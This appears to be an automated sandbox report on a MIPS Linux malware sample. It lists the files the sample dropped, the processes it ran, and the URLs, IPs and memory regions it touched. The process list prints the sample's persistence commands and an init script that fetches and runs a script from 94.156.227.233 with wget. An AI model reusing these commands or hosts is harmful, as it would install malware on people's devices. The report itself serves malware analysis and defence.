Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
mips.nn.elf
|
ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
|
initial sample
|
||
/etc/init.d/mips.nn.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/init.d/system
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/etc/profile
|
ASCII text
|
dropped
|
||
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
||
/boot/bootcmd
|
ASCII text
|
dropped
|
||
/etc/inittab
|
ASCII text
|
dropped
|
||
/etc/motd
|
ASCII text
|
dropped
|
||
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
/tmp/qemu-open.6Os42J (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
/tmp/mips.nn.elf
|
/tmp/mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/system
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/system /etc/rcS.d/S99system
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/mips.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting mips.nn.elf'\n /tmp/mips.nn.elf
&\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo
'Stopping mips.nn.elf'\n killall mips.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage:
$0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/mips.nn.elf"
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "chmod +x /etc/init.d/mips.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/chmod
|
chmod +x /etc/init.d/mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
/tmp/mips.nn.elf
|
-
|
||
/bin/sh
|
sh -c "ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf >/dev/null 2>&1"
|
||
/bin/sh
|
-
|
||
/usr/bin/ln
|
ln -s /etc/init.d/mips.nn.elf /etc/rc.d/S99mips.nn.elf
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/tmp/mips.nn.elf
|
-
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/systemd/systemd
|
-
|
||
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/libexec/gnome-session-binary
|
-
|
||
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
/usr/lib/udisks2/udisksd
|
-
|
||
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 36 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://94.156.227.233/curl.sh
|
unknown
|
||
http://94.156.227.233/lol.sh
|
unknown
|
||
http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
|
unknown
|
||
http://94.156.227.233/
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
71.85.172.121
|
unknown
|
United States
|
||
52.102.179.50
|
unknown
|
United States
|
||
130.99.1.125
|
unknown
|
United States
|
||
30.241.227.29
|
unknown
|
United States
|
||
210.122.139.47
|
unknown
|
Korea Republic of
|
||
3.90.193.102
|
unknown
|
United States
|
||
96.15.206.62
|
unknown
|
United States
|
||
98.62.209.133
|
unknown
|
United States
|
||
133.176.177.55
|
unknown
|
Japan
|
||
125.255.90.208
|
unknown
|
Japan
|
||
43.213.178.195
|
unknown
|
Japan
|
||
123.196.85.13
|
unknown
|
China
|
||
16.232.191.72
|
unknown
|
United States
|
||
60.248.84.35
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
179.120.169.70
|
unknown
|
Brazil
|
||
140.45.68.171
|
unknown
|
United States
|
||
24.104.27.194
|
unknown
|
United States
|
||
213.237.62.150
|
unknown
|
Denmark
|
||
65.242.120.220
|
unknown
|
United States
|
||
23.57.209.219
|
unknown
|
United States
|
||
177.28.201.152
|
unknown
|
Brazil
|
||
74.46.133.37
|
unknown
|
United States
|
||
123.62.119.123
|
unknown
|
China
|
||
78.160.247.18
|
unknown
|
Turkey
|
||
60.146.162.245
|
unknown
|
Japan
|
||
186.12.11.37
|
unknown
|
Argentina
|
||
20.25.224.111
|
unknown
|
United States
|
||
45.2.160.226
|
unknown
|
Canada
|
||
117.198.224.153
|
unknown
|
India
|
||
216.134.58.20
|
unknown
|
United States
|
||
66.195.45.192
|
unknown
|
United States
|
||
222.39.120.74
|
unknown
|
China
|
||
204.181.145.33
|
unknown
|
United States
|
||
8.195.247.249
|
unknown
|
United States
|
||
88.241.210.57
|
unknown
|
Turkey
|
||
210.178.237.249
|
unknown
|
Korea Republic of
|
||
215.50.167.215
|
unknown
|
United States
|
||
78.140.240.209
|
unknown
|
Russian Federation
|
||
57.236.105.99
|
unknown
|
Belgium
|
||
18.159.41.41
|
unknown
|
United States
|
||
197.153.128.251
|
unknown
|
Morocco
|
||
211.52.79.67
|
unknown
|
Korea Republic of
|
||
93.209.197.112
|
unknown
|
Germany
|
||
70.199.108.94
|
unknown
|
United States
|
||
26.0.17.143
|
unknown
|
United States
|
||
43.112.217.239
|
unknown
|
Japan
|
||
159.73.177.227
|
unknown
|
Australia
|
||
68.177.81.58
|
unknown
|
United States
|
||
202.61.108.43
|
unknown
|
unknown
|
||
111.233.254.164
|
unknown
|
Japan
|
||
34.8.131.16
|
unknown
|
United States
|
||
112.207.142.132
|
unknown
|
Philippines
|
||
197.78.59.83
|
unknown
|
South Africa
|
||
83.59.238.196
|
unknown
|
Spain
|
||
18.45.150.132
|
unknown
|
United States
|
||
50.219.45.146
|
unknown
|
United States
|
||
106.194.185.156
|
unknown
|
India
|
||
140.44.148.110
|
unknown
|
United States
|
||
110.250.130.150
|
unknown
|
China
|
||
82.173.157.58
|
unknown
|
Netherlands
|
||
25.190.203.72
|
unknown
|
United Kingdom
|
||
112.131.194.70
|
unknown
|
China
|
||
214.218.33.123
|
unknown
|
United States
|
||
180.51.101.201
|
unknown
|
Japan
|
||
123.162.233.163
|
unknown
|
China
|
||
177.112.78.39
|
unknown
|
Brazil
|
||
2.29.117.56
|
unknown
|
United Kingdom
|
||
134.125.19.84
|
unknown
|
United States
|
||
163.168.179.99
|
unknown
|
Switzerland
|
||
34.201.15.152
|
unknown
|
United States
|
||
51.249.201.114
|
unknown
|
United States
|
||
25.91.159.36
|
unknown
|
United Kingdom
|
||
31.71.159.62
|
unknown
|
United Kingdom
|
||
16.16.85.23
|
unknown
|
United States
|
||
158.68.106.184
|
unknown
|
United States
|
||
65.188.142.178
|
unknown
|
United States
|
||
109.202.11.184
|
unknown
|
Russian Federation
|
||
99.214.146.212
|
unknown
|
Canada
|
||
23.190.38.252
|
unknown
|
Reserved
|
||
50.99.128.40
|
unknown
|
Canada
|
||
53.29.64.118
|
unknown
|
Germany
|
||
63.14.20.134
|
unknown
|
United States
|
||
179.147.151.249
|
unknown
|
Brazil
|
||
142.139.14.245
|
unknown
|
Canada
|
||
162.89.43.62
|
unknown
|
United States
|
||
84.59.198.152
|
unknown
|
Germany
|
||
101.241.166.175
|
unknown
|
China
|
||
62.79.232.196
|
unknown
|
Denmark
|
||
40.176.186.198
|
unknown
|
United States
|
||
39.189.18.12
|
unknown
|
China
|
||
198.207.3.101
|
unknown
|
United States
|
||
46.147.58.102
|
unknown
|
Russian Federation
|
||
139.38.79.26
|
unknown
|
United States
|
||
125.40.151.243
|
unknown
|
China
|
||
216.186.108.115
|
unknown
|
United States
|
||
18.43.36.150
|
unknown
|
United States
|
||
24.100.12.157
|
unknown
|
United States
|
||
223.95.137.37
|
unknown
|
China
|
||
115.217.42.191
|
unknown
|
China
|
||
68.167.155.178
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
7fcca4421000
|
page execute read
|
|||
7fcd2a143000
|
page read and write
|
|||
7fcd29bf1000
|
page read and write
|
|||
7fcd24000000
|
page read and write
|
|||
55a7798c9000
|
page execute and read and write
|
|||
7fcd2a26c000
|
page read and write
|
|||
7fcca4467000
|
page read and write
|
|||
55a77aa9d000
|
page read and write
|
|||
7fcd2a274000
|
page read and write
|
|||
55a777639000
|
page execute read
|
|||
7fcca4462000
|
page read and write
|
|||
55a7778cb000
|
page read and write
|
|||
7ffddbe11000
|
page read and write
|
|||
55a7778c1000
|
page read and write
|
|||
7fcd24021000
|
page read and write
|
|||
7fcd29c31000
|
page read and write
|
|||
7fcd29592000
|
page read and write
|
|||
7fcd295a0000
|
page read and write
|
|||
55a7798e0000
|
page read and write
|
|||
7ffddbff1000
|
page execute read
|
|||
7fcd29850000
|
page read and write
|
|||
7fcd29c14000
|
page read and write
|
|||
7fcd2a2b9000
|
page read and write
|
|||
7fcd29f62000
|
page read and write
|
|||
7fcd28d8a000
|
page read and write
|
There are 15 hidden memdumps, click here to show them.